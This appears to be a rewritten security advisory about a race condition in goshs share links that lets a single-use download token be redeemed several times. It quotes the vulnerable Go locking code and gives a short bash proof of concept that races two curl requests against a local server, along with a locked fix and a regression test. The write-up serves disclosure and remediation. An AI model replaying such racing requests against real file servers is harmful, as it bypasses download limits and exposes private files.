How the Vulnerability Works
The vulnerability resides in the `ShareHandler` of goshs, specifically within the token redemption logic for share links. When a share token is created with a `DownloadLimit` (e.g., `limit=1` for a single-use link), the server is expected to allow only that many downloads before invalidating the token. However, the implementation contains a classic Time-of-Check to Time-of-Use (TOCTOU) race condition that allows concurrent requests to bypass this limit.
The handler reads the share token’s `DownloadLimit` and current `Downloaded` count while holding a read lock (RLock). It then releases this lock before serving the actual file content. The critical section of code is in `httpserver/handler.go` between lines 978 and 1008:
```go
fs.sharedLinksMu.RLock()
entry, ok := fs.SharedLinks[token]
fs.sharedLinksMu.RUnlock() // <-- lock released here
// ... limit check against the snapshot in entry, then serve file ... // <-- file transfer happens unlocked
fs.sharedLinksMu.Lock() // <-- lock re-acquired only now
current.Downloaded++    // current: the same share entry, updated only after the transfer
if current.Downloaded >= current.DownloadLimit {
	delete(fs.SharedLinks, token)
}
fs.sharedLinksMu.Unlock()
```
Because the lock is released before the file is served and only re-acquired after the transfer completes, multiple concurrent goroutines can interleave in the window between the `RUnlock` and the subsequent `Lock`. Each goroutine observes the same pre-increment snapshot of `Downloaded` and `DownloadLimit`, passes the limit check, and proceeds to serve the file. The counter is incremented only after the file has been fully transmitted, so every racing request succeeds in redeeming the token.
This flaw effectively nullifies the `DownloadLimit` constraint, turning a supposedly single-use share link into a multi-use one. The issue affects all goshs releases that include the share-link feature, up to and including v2.0.9. The reporter, Nishant Verma, reproduced the issue 5 out of 5 times on a 2026-era M-series Mac, confirming the race condition is reliably triggerable.
What Undercode Say:
```bash
# Start goshs with the share-link feature (port, served directory, basic-auth credentials)
goshs -p 18000 -d /tmp/r -b admin:pw &
# Create a file to share
echo data > /tmp/r/f.txt
# Generate a single-use share token (limit=1)
SHARE=$(curl -su admin:pw "http://localhost:18000/f.txt?share&limit=1")
# Extract the token value from the returned share URL
TK=$(echo "$SHARE" | sed -n 's/.*token=\([^"]*\)".*/\1/p')
# Race two concurrent redemptions of the same token
curl -so /dev/null -w "%{http_code}\n" "http://localhost:18000/?token=$TK" &
curl -so /dev/null -w "%{http_code}\n" "http://localhost:18000/?token=$TK" &
wait
```
Observed: `200 / 200` (both succeed), i.e. the `limit=1` token was redeemed twice.
Exploit:
An attacker can intercept or guess a share token (e.g., from mail forwarding, browser history, or logs) and launch multiple concurrent HTTP requests to the share link. Due to the race condition, all requests will be served, exceeding the intended download cap. This can be chained with other token-leak vectors to multiply the exfiltration window.
Protection:
Apply the suggested fix by moving the limit check and counter increment under the write lock before serving the file:
```go
fs.sharedLinksMu.Lock()
entry, ok := fs.SharedLinks[token]
if !ok || time.Now().After(entry.Expires) ||
	(entry.DownloadLimit != -1 && entry.Downloaded >= entry.DownloadLimit) {
	fs.sharedLinksMu.Unlock()
	http.NotFound(w, r)
	return
}
entry.Downloaded++
if entry.DownloadLimit != -1 && entry.Downloaded >= entry.DownloadLimit {
	delete(fs.SharedLinks, token) // last permitted download: token removed before serving
} else {
	fs.SharedLinks[token] = entry // store the incremented copy back
}
fs.sharedLinksMu.Unlock()
// ... serve file ...
```
Additionally, add a regression test that races two requests against a `limit=1` token and asserts exactly one `200` response.
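The locking pattern from the fix above, together with the regression check the previous sentence calls for, as an added example that is not goshs' own code: `Entry`, `Store`, `RedeemFixed` and `RaceRedeem` are stand-in names, and the entry fields are assumed to match the ones the excerpts use.

```go
package main
import (
	"sync"
	"time"
)

// Entry mirrors the fields the advisory excerpt uses (a stand-in, not goshs' own type).
type Entry struct {
	Expires                   time.Time
	DownloadLimit, Downloaded int // a limit of -1 means unlimited
}

// Store keeps share tokens behind one RWMutex, as sharedLinksMu does in the excerpt.
type Store struct {
	mu    sync.RWMutex
	links map[string]Entry
}

// RedeemFixed is the patched ordering: check, increment and delete all happen under the write lock, before any file bytes are served.
func (s *Store) RedeemFixed(token string) bool {
	s.mu.Lock()
	defer s.mu.Unlock()
	entry, ok := s.links[token]
	if !ok || time.Now().After(entry.Expires) ||
		(entry.DownloadLimit != -1 && entry.Downloaded >= entry.DownloadLimit) {
		return false // the handler answers 404 here
	}
	entry.Downloaded++
	if entry.DownloadLimit != -1 && entry.Downloaded >= entry.DownloadLimit {
		delete(s.links, token) // last permitted download: the token is gone before it is served
	} else {
		s.links[token] = entry // the map holds values, so the incremented copy is stored back
	}
	return true // the handler serves the file here
}

// RaceRedeem is the regression check: n goroutines redeem one token at once; it returns how many were admitted.
func (s *Store) RaceRedeem(token string, n int) int {
	results := make(chan bool, n)
	for i := 0; i < n; i++ {
		go func() { results <- s.RedeemFixed(token) }()
	}
	admitted := 0
	for i := 0; i < n; i++ {
		if <-results {
			admitted++
		}
	}
	return admitted
}
```

Run it under `go test -race` so the detector also confirms no unsynchronised access to the map remains.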
Impact:
A “single-use” share intended to deliver a one-shot secret can be redeemed N times by N concurrent clients. This breaks the integrity of download limits and can lead to unauthorized access to sensitive files, especially when combined with token leakage. Operators relying on share links for secure, one-time file delivery will find their access controls silently undermined.
Sources:
Reported By: github.com